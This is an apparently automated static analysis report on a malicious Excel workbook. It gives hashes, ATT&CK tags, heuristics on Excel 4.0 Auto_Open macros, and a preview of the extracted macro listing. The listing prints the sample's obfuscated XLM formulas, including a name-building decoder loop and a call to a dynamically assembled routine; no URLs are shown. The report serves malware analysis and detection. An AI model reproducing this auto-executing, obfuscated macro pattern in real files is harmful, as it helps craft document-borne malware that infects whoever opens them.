Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 75c53fe18c077cff…

MALICIOUS

Office (OLE)

36.0 KB Created: 2020-11-25 10:42:36 Authoring application: Microsoft Excel First seen: 2021-08-20
MD5: d7681dec2d47a7354078ae1b6ad21848 SHA-1: fafc76aed43060d6c95cfbe49d63609da1013814 SHA-256: 75c53fe18c077cff944bd047517149f0ef71b6abf15e6f9a25158aa7b272f956
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open entry, which is a known method for executing malicious code. The macro sheet contains a dangerous formula API call (RUN=0), suggesting it is designed to execute a payload. While no specific URLs or hashes were extracted, the presence of Auto_Open strongly implies a downloader or dropper functionality.

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6709 bytes
SHA-256: d17ec1a8dafe3e7a8beb2daf4ef845bad9956bd00a8a57c04548526a9d885b76
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  AXIhtoKvTgq
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!C188 
' 0018     27 LABEL : Cell Value, String Constant - FbTQxHHQykdl len=0 
' 0018     22 LABEL : Cell Value, String Constant - fGDOYTo len=0 
' 0018     26 LABEL : Cell Value, String Constant - fpzGzdldDAY len=0 
' 0018     24 LABEL : Cell Value, String Constant - jhVpDdVzB len=0 
' 0018     27 LABEL : Cell Value, String Constant - jLTygsDeNDrJ len=0 
' 0018     24 LABEL : Cell Value, String Constant - KfpxRAXTE len=0 
' 0018     22 LABEL : Cell Value, String Constant - lAEAAlA len=0 
' 0018     24 LABEL : Cell Value, String Constant - lkdIwqHUH len=0 
' 0018     23 LABEL : Cell Value, String Constant - MJAOEzpM len=0 
' 0018     27 LABEL : Cell Value, String Constant - NntQmIcwQmxo len=0 
' 0018     25 LABEL : Cell Value, String Constant - nPQdsUjNNs len=0 
' 0018     25 LABEL : Cell Value, String Constant - nUlsfnhVaD len=0 
' 0018     21 LABEL : Cell Value, String Constant - pPpklw len=0 
' 0018     20 LABEL : Cell Value, String Constant - QAOVD len=0 
' 0018     27 LABEL : Cell Value, String Constant - snLfpdblixPy len=0 
' 0018     27 LABEL : Cell Value, String Constant - VgqToRBqHnwN len=0 
' 0018     27 LABEL : Cell Value, String Constant - XmbZXnMrOFtm len=0 
' 0018     21 LABEL : Cell Value, String Constant - YTCmUQ len=0 
' 0018     22 LABEL : Cell Value, String Constant - ZAiQzjB len=0 
' 0018     22 LABEL : Cell Value, String Constant - zgpYjqh len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  AXIhtoKvTgq,C96,"SET.NAME("FbTQxHHQykdl",VALUE("0"))",""
'  AXIhtoKvTgq,C101,"SET.NAME("XmbZXnMrOFtm",FbTQxHHQykdl)",""
'  AXIhtoKvTgq,C104,"SET.NAME("NntQmIcwQmxo",FbTQxHHQykdl)",""
'  AXIhtoKvTgq,C106,"SET.NAME("YTCmUQ",COUNTA(jLTygsDeNDrJ))",""
'  AXIhtoKvTgq,C110,"SET.NAME("nUlsfnhVaD",COUNTA(MJAOEzpM))",""
'  AXIhtoKvTgq,C114,[],""
'  AXIhtoKvTgq,C117,"SET.NAME("snLfpdblixPy","")",""
'  AXIhtoKvTgq,C120,"XmbZXnMrOFtm",""
'  AXIhtoKvTgq,C123,"SET.NAME("ZAiQzjB",HLOOKUP("*",jLTygsDeNDrJ,XmbZXnMrOFtm,FALSE))",""
'  AXIhtoKvTgq,C126,"fpzGzdldDAY",""
'  AXIhtoKvTgq,C128,"SET.NAME("pPpklw",FbTQxHHQykdl)",""
'  AXIhtoKvTgq,C130,[],""
'  AXIhtoKvTgq,C132,"pPpklw",""
'  AXIhtoKvTgq,C136,"VgqToRBqHnwN",""
'  AXIhtoKvTgq,C141,"lAEAAlA",""
'  AXIhtoKvTgq,C145,"zgpYjqh",""
'  AXIhtoKvTgq,C147,"SET.NAME("KfpxRAXTE",VALUE(HLOOKUP("*",MJAOEzpM,zgpYjqh,FALSE)))",""
'  AXIhtoKvTgq,C152,"lkdIwqHUH",""
'  AXIhtoKvTgq,C156,"snLfpdblixPy",""
'  AXIhtoKvTgq,C159,"NntQmIcwQmxo",""
'  AXIhtoKvTgq,C163,NEXT(),""
'  AXIhtoKvTgq,C166,"jhVpDdVzB",""
'  AXIhtoKvTgq,C169,"SET.NAME("f",INT(T(FORMULA(T(snLfpdblixPy)&"",""&T(jhVpDdVzB)))))",""
'  AXIhtoKvTgq,C174,"nPQdsUjNNs",""
'  AXIhtoKvTgq,C179,NEXT(),""
'  AXIhtoKvTgq,C184,RETURN(),""
'  AXIhtoKvTgq,C209,"SET.NAME("fGDOYTo",C96)",""
'  AXIhtoKvTgq,C214,"jLTygsDeNDrJ",""
'  AXIhtoKvTgq,C216,"SET.NAME("MJAOEzpM",R93C12)",""
'  AXIhtoKvTgq,C219,"SET.NAME("nPQdsUjNNs",226)",""
'  AXIhtoKvTgq,C223,"SET.NAME("QAOVD",3)",""
'  AXIhtoKvTgq,C225,fGDOYTo(),""
'  AXIhtoKvTgq,C226,HALT(),""